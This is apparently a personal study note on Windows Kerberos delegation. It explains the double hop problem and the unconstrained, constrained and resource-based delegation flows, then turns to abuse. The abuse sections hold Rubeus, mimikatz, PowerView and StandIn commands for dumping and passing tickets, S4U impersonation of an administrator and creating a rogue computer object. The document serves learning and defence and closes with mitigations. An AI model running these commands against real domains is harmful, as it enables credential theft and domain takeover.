
Credits to ATTL4S to helping me understand this, and I also used some of his images.

Personally, Kerberos and its delegation mechanisms have always been a little fuzzy for me, and I wanted to take the time to understand it. Basically, this page is my attempt of understanding Delegation, why its used and attacks on it phrased in my own words.

Double Hop Problem

Suppose a user logs in to a machine, let's say the WEB machine, but how does the WEB machine authenticate to the same server and access the database folders? This is where's Windows Authentication mechanism comes in.

This idea of "acting on the behalf of another user" is possible thanks to Windows's Client Impersonation feature as part of authentication. When we attempt to connect to the web app, credentials are verified, and an acces token with the security context of the user is created.

When we enter the credentials of the user, this would be compared against the credentials stored in lsass.exe and create a new user logon session and access token on the target system. The service places a copy of that Token into a new thread, and this new thread can act on the user's behalf. Since we have credentials, the new logon session would have credentials and thus we can operate normally.

This token thing is also the reason why we can 'steal tokens' from processes running as other users to impersonate them and run commands as them.

However, this assumes that the resources we want to access are on the SAME SERVER. For example, if the C:\Database and C:\Web folders are both located within the WEB machine, then just having the user's password is enough.

If there are 2 different servers, say WEB and DB, then this method of authentication would not work. lsass.exe would not normally store the credentials of another user from another machine. A new logon session is thus still created, but because we have no credentials, we cannot go anywhere with this session. This is known as the Double Hop Problem.


Delegation basically allows a user or machine to act on the behalf of another user to another service. One common implementation is where a user authenticates to a front-end web application that serves a back-end database.

The front-end needs to authenticate to the back-end database (using Kerberos) as the authenticated user. This is how delegation works in a nutshell:

Password / NTLM Authentication?

Delegation allows for the impersonation of users in the network and not only locally. Access tokens that are created using credentials are for local purposes only. For this, we can use credential delegation, and one common example is Remote Powershell Sessions.

This method involves sending some kind of credential material to the service, so that the service can impersonate clients in the network. Here are some commands that make use of this feature:

#Predefine necessary information
$Username = "YOURDOMAIN\username"
$Password = "password"
$ComputerName = "server"
$Script = {notepad.exe}
#Create credential object
$SecurePassWord = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList $Username, $SecurePassWord
#Create session object with this
$Session = New-PSSession -ComputerName $ComputerName -credential $Cred
# Enter-PSSession
$job = invoke-command -session $session -scriptblock $script
echo $job

This solves the Double Hop problem, because we can access another user and run commands as a user on the network instead of just locally. This method would also require the user to be part of the Remote Management Group on the network.

Obviously, this is not the most secure method as sending credentials in plaintext is never a good idea, especially for service accounts (which generally have high permissions over certain resources in the domain). Sending NTLM hashes is also not great because Pass The Hash attacks exist. As such, it is normal for NTLM authentication to be disabled completely.

In the HTB machine Hathor, NTLM authentication (and hence passwords) are completely disabled, leaving us with only Kerberos authentication. Kerberos authentication, while still risky, does not depend on the user's original password or NTLM hashes. The authentication is based on tickets and session keys, and they are trusted by default.

Having tickets and session keys cached on a server is relatively more secure compared to passwords or hashes in general. This is why in some systems, only Kerberos authentication is allowed.

There are 3 main types of delegation available in AD systems:

  1. Unconstrained Delegation

  2. Constrained Delgation

  3. Role-Based Constrained Delegation (RBCD)

Exploitation of any of these privileges is not a CVE, but rather an abuse of a service. This uses the intentional features of the system against itself.

Unconstrained Delegation

This is the first type of delegation introduced in Windows 2000. When configured, the KDC would include a copy of the user's TGT inside the TGS. when the user accesses the DB machine, it extracts the user's TGT from the TGS and caches it in memory. Then, it would use this TGT to request for a TGS, which would allow for the accessing of database resources.

The service can act on behalf of the client in the network simply by using its TGT. This feature requires the SeEnableDelegation privilege to be enabled. We can configure this like so:

With this setting enabled, all we need are credentials for the user. Now suppose that we are on WEB machine and want to access the files on the DB machine, and we can do so using a web login form. This is how the requests are formed:

  1. AS REQ -> WEB machine requests for TGT from DC. This part requires the credentials of the user to be correct in order to authenticate to the KDC.

  2. AS REP -> DC sends the web_user TGT to the WEB machine as a reply after verifying that we have the right credentials.

  3. TGS REQ 1 -> The WEB machine would send a TGS REQ, specifying a target SPN such as HTTP/db.corp.local. This would be sent along with the TGT.

  4. TGS REP 1 -> The KDC notices that we have Unconstrained Delegation set. As such, the resulting HTTP Service Ticket sent back has the ok-as-delegate flag set in the reply. This would inform the WEB machine that the service is suitable as a delegate. The KDC sends back the TGS required.

  5. TGS REQ 2 -> The WEB machine sends another request to the DC with the TGT and SPN of krbtgt/corp.local. WEB also asks for a forwarded TGT to be sent to the service. The forwarded flag of the ticket has been set to true for this.

  6. TGS REP 2 -> The KDC expects this request as a follow-up because the Unconstrained setting is enabled, and it expects the forwarded flag of the TGT to be set to true. It checks for this, and then it sends back an encTGSRep and an authenticator string that also has the forwarded flag set to true.

  7. AP REQ (HTTP) -> This part happens when we send a request to the resource (such as ls \\db\c$ or visiting a particular resource). Using the encrypted TGS REP, the WEB machine sends the Service Ticket for HTTP/db.corp.local and an Authenticator string received from TGS REP 2. The session key and TGT are present within the krb-cred structure, and other information is decrypted here.

  8. TGS REQ 3 -> The DB machine sends a regular TGS REQ on behalf of the WEB user with the authenticator string required. This time, it requests using SPN of cifs/db.corp.local.

  9. TGS REP 3 -> The DC replies to DB with a basic TGS REP and sends over another encTGSRep for the WEB user and SPN of cifs.

  10. AP REQ (SMB) -> Another AP REQ through SMB is sent on behalf of the WEB user. This time, it presents the cifs ticket + authenticator strings.

  11. AP REP (SMB) -> The cifs service sends an AP REP through SMB, which contains an ST for cifs/db.corp.local encrypted with the session key.

  12. AP REP (HTTP) -> The cifs/db.corp.local ST is sent back to the WEB machine, and this establishes mutual authentication between the WEB and DB machines. Thus, we can access the file system or other resources of the DB machine from WEB after this final reply.

That's a lot to take in. Here's a packet capture from ATTL4S regarding this subject (take note he uses different machines here, but the concept is roughly the same):


Unconstrained Delegation would cache the user's TGT regardless of which service is being accessed by the user. For example, if an administrator accesses a file share on the machine that uses Kerberos, their TGT will be cached.

If we can compromise this machine, the TGTs can be extracted from memory and used to impersonate the users against other services in the domain. This can be done through:

  • Phishing

  • Abuse of user clicking on certain files (like .lnk or .scf files)

  • RPC, abusing xp_dirtree, using tools such as SharpSpoolTrigger.exe, etc... As long as are able to make one machine interact with another in some way.

We can use Rubeus.exe to exploit this. Suppose that we have the use'rs TGT already cached on the machine (via forcing or scheduled task exploitation). We can use the triage and dump functions to retrieve this ticket:

# find all tickets
Rubeus.exe triage
# dump tickets
Rubeus.exe dump /luid:0x14794e /nowrap
# pass this ticket
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:corp.local /username:administrator /password:password123 /ticket:<TICKET>
# in cobalt strike
steal_token <PID> 

Alternatively, we can use mimikatz to exploit this by first exporting all tickets and then passing them along to allow us to access the remote file system or establish a remote Powershell session.

mimikatz::tickets /export

mimikatz # kerberos::ptt C:\Users\Administrator\Desktop\mimikatz\[0;3c785]-2-0-40e10000-Administrator@krbtgt-OFFENSE.LOCAL.kirbi

Constrained Delegation

This new method was introduced in 2003 as a safer means to perform Kerberos delegation. It is the same thing, but this time it restricts the services to which the server can act on behalf of a user. It also no longer allows the server to cache the TGTs of other users, but it does allow for the server to request a TGS for another user with its own TGT.

To configure this, we just have to check the other setting and specify what type of authentication is allowed:

Additionally, there are 2 new Service-For-User (S4U) Kerberos extensions introduced for these services:

  • Kerberos constrained delegation extension called S4UProxy.

    • Allows a service to obtain a ST on behalf of a client to a different service.

    • Only ST is required to show that client has authenticated.

  • Kerberos protocol transition extension called S4USelf.

    • Allows a service to obtain a ST to itself to show that a client has authenticated.

    • Any service account with an SPN can invoke S4U2Self. The resulting ST can vary depending on the rights of the service account.

The Kerberos only option uses S4U2Proxy, while the other option both new extensions. Setting up these configurations requires either DA or EA privileges (to enable SeEnableDelegation). I'll break both of these options down here.

Kerberos Only

In the interest of keeping this page shorter, I won't be covering the full request here since it's largely the same as Unconstrained Delegation except for a few changes. Again, ATTL4S provides a clear packet capture on how it works:

The differences are in the TGS REQ and TGS REP to the cifs service with the S4U2Proxy extension. It's the same up the point AFTER the AP REQ (HTTP) part:

  1. TGS REQ 3 -> This takes the machine's TGT + authenticator string and sends a request for SPN cifs/db.corp.local. Additionally, the user's ST is sent too. This request would have the RBCD and Constrained Delegation flags set to true. The user's ST also has the forwardable flag set to true.

  2. TGS REP 3 -> The DC checks whether the current WEB machine is able to delegate to the service requested (whether WEB can delegate to DB). It then responds with the user's ST + Session Key.

  3. AP REQ (SMB) -> The WEB machine sends an AP REQ through SMB on behalf of the user.

  4. AP REP (SMB) -> The AP REP would send the ST back, and it would sent the AP REP (HTTP) back to the WEB machine. This would complete the authentication process.

This is deemed more secure than Unconstrained Delegation because it no longer allows servers to cache the TGTs of other users, but rather it allows the user to request a TGS for another user using their own TGT.

Abuse of Kerberos Only

The abuse of this service only requires an addtional ticket as a requirement to invoke S4U2Proxy. In short, we just need the TGT of the principal that is trusted for delegation, and we can use Rubeus.exe to gain access to the resource. The most common method of abuse involves using RBCD (which will be covered below).

We can find out the principals that are trusted for delegation by checking for the msds-allowedtodelegate attribute.

ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

    "dnshostname": "",
    "samaccountname": "SQL-2$",
    "msds-allowedtodelegateto": [

There are other ways to enumerate this with Powershell and what not. How the exploit works is first getting the TGT of the SQL-2 machine in the above example. Afterwards, we can use Rubeus.exe s4u module to request a ST for the resource we want, in this case the cifs/dc-2 service.

.\Rubeus.exe s4u /impersonateuser:administrator /user:SQL$ /msdsspn:cifs/dc-2 /ticket:<TICKET> /nowrap

The above command would return the ticket that we can use to createnetonly and access the file system of dc-2 via cifs/dc-2.

Here's what Rubeus is basically doing: Obtain TGS using TGT (passed in) for user via S4U2Self to current machine -> Build S4U2Proxy request to obtain TGS for user to service required. This works because we have the initial TGT obtained.

Protocol Transition

In short, this is the machine's way of saying that it doesn't actually care how the client authenticates. It can be via cleartext password, NTLM hashes or whatever. This can be configured by specifying a provider:

This would make use of the S4U2Self extension, and we can technically invoke S4U2Proxy using this even if we don't have an additional ticket to use. Again, ATTL4S provides the network traffic:

There are bigger differences in the requests made using this method:

  1. TGS REQ 1 (S4U2Self) -> The WEB machine would request for the user's fowardable ST for itself using S4U2Self. This is because the initial authentication uses NTLM, and there are no STs sent by the client.

  2. TGS REP 1 (S4U2Self) -> The DC verifies that the WEB machine has the TRUSTED_TO_AUTH_FOR_DELEGATION flag and responds by sending back the user's ST. The ST that is sent back is forwadable thanks to S4U2Self.

  1. TGS REQ 2 (S4U2Proxy) -> Uses the WEB TGT + the user's forwardable ST and requests for a TGS for cifs or other services on another machine like DB.

  2. TGS REP 3 (S4U2Proxy) -> DC checks if WEB can delegate to DB. Then, it also checks if the additional ticket is forwadable. Afterwards, it responds with the user's ST + encTGSRep. If this ticket is not marked as forwardable, then there would have been an error. The KDC would try for RBCD as a 'fallback'.

  3. AP REQ (SMB) -> AP REQ through SMB on behalf of the user, and this uses the cifs TGS it received earlier.

  4. AP REP (SMB) -> AP REP through SMB that sends an ST for the cifs service on DB. Afterwards, this is sent via the AP REP (HTTP) to grant access to the services.

Abuse of Protocol Transition

An account configured with protocol transition can invoke S4U4Self to impersonate any user and obtain a forwardable ST for S4U2Proxy. This ST obtained can be configured to target others from the same service since the service name of a ST is in plaintext and can be changed.

To abuse this, we would first need to request for a TGT for WEB or the machine we are on. This can be done via Rubeus.exe by either dumping tickets from memory, passing a hash, whatever.

Rubeus.exe s4u /impersonateuser:Administrator /user:WEB$ /rc4:<HASH> /msdspn:cifs/DB /altservice:http/DB /nowrap

The /altservice flag is the the service name that we have substituted, since it is in plaintext after all. The command above would invoke S4U2Self to obtain an ST for the administrator. The resulting ticket would be forwardable, and thus can be used to invoke S4U2Proxy.

This would allow us to basically retrieve the ST of the alternate service we have specified.

Resource-Based Constrained Delegation (RBCD)

Enabling either Constrained or Unconstrained Delegation requires the SeEnableDelegationPrivilege to be enabled for users, which can only be done using DA or EA rights.

When we configure the msds-AllowedToDelegateTo attribute, the backend server has no say in this. For example, if we configure the WEB machine such that it can delegate to the DB server, it is done on the WEB machine, and the DB machine has no choice but to say yes.

RBCD reverses this concept by letting the DB machine (or backend) to control instead through another attribute called msds-allowedtoactonbehalfofotheridentity attribute. This attribute does not require DA or EA privileges, and we only need one of these privileges to do so:

  • WriteProperty

  • GenericAll

  • GenericWrite

  • WriteDacl

Again, to re-emphasise, the configuration is done on the 'backend' machine and does not require DA or EA permissions. We just need to be an administrator on the 'backend' machine.

This method of authentication is closely related to the classic Constrained Delegation and uses the S4U extensions. Here's a snippet of the traffic:

It is largely the same as the Constrained Delegation Protocol Transition method of authenticating, with a few differences:

  1. TGS REQ 1 (S4U2Self) -> Sends the WEB TGT and requests for the user's forwadable ST using S4U2Self.

  2. TGS REP 1 (S4U2Self) -> DC checks that the TRUSTED_TO_AUTH_FOR_DELEGATION flag is NOT ENABLED. Reponds with the user's NON-FORWADABLE ST. This is because the WEB machine is not trusted.

  3. TGS REQ 2 (S4U2Proxy) -> Takes WEB TGT + User's non-forwadable ST from S4U2Self and requests for the cifs/DB service. Both the RBCD and Constrained Delegation bits are set!!!

  4. TGS REP 2 (S4U2Proxy) -> DC verifies that RBCD bit is set, and checks whether WEB can delegate to DB via the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. In RBCD, invoking S4U2Proxy with a non forwardable ST results in a forwadable ST. With classic Constrained Delegation, this would have failed. The DC then responds with the user's ST + Session Key.

  5. AP REQ (SMB) -> Same as above.

  6. AP REP (SMB) -> Same as above. The resulting ST for cifs/DB is sent through the AP-REP (HTTP).


If we have write access over the msDS-AllowedToActOnBehalfOfOtherIdentity, we can configure RBCD. We just need to have an account that is able to invoke S4U2Self and S4U2Proxy, which generally any service account can do.


First we have to grab the TGT of the WEB machine via whatever method and invoke the S4U2Self method:

Rubeus.exe s4u /impersonateuser:administrator /user:WEB$ /rc4: /msdsspn:cifs/DB 

This would give us an ST for the administrator that is non-forwadable. The ST can be used to invoke S4U2Self and obtain an ST for the trusting service:

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:corp /username:administrator /password:FakePass /ticket:

Configure Ourselves

Sometimes, we don't have the required attribute enabled, but we can configure it. First we have to determine if our current machine has the required privileges and create a new security descriptor:

Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

# Suppose we have access to the correct user / machine and we have the required privileges over the DB machine:
Get-DomainComputer -Identity WEB -Properties objectSid

# Create Security Descriptor for the msDS-AllowedToActOnBehalfOfOtherIdentity in raw binary format
$rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-569305411-121244042-2357301523-1109)"
$rsdb = New-Object byte[] ($rsd.BinaryLength)
$rsd.GetBinaryForm($rsdb, 0)

# then grab the current machine's TGT and run the commands for Rubeus to perform s4u to grab the ST of the cifs service on DB.

Create Object

If we do not have administrative access over our current machine for whatever reason, we can create our own computer object. By default, even domain users can join up to 10 computers to a domain via the msds-MachineAccountQuota attribute.

This method of abuse can be done via LDAP, Powershell or StandIn.exe:

# create new object with random password given
StandIn.exe --computer EvilComputer --make

# calculate RC4 Hash
Rubeus.exe hash /password:oIrpupAtF1YCXaw /user:EvilComputer$ /domain:corp

# grab TGT of our new device
Rubeus.exe asktgt /user:EvilComputer$ /rc4 OR aes256: /nowrap

# now that we have a TGT our new machine, we can configure the SDDL required and grab the ST of the service we want!

There are other methods of abuse located all over the internet, in cheatsheets or other people's Gitbooks. These aren't the only methods of abuse, and there are plenty more, but the general idea is the same!


To prevent such attacks, we can do a few things:

  • Protected Users Group -> Users part of this group would cause the KDC to not set the STs given to be FORWADABLE or PROXIFIABLE.

  • Flag account as sensitive -> This bit would cause TGTs and STs obtained by this account to not be forwadable or proxifiable even when requested.

Either one of these would totally prevent S4U2Self and S4U2Proxy from working entirely. These methods cannot prevent all forms of abuse. If you stash your credentials in plaintext on your desktop and it is compromised, then that's on you. No amount of delegation can prevent that!

Last updated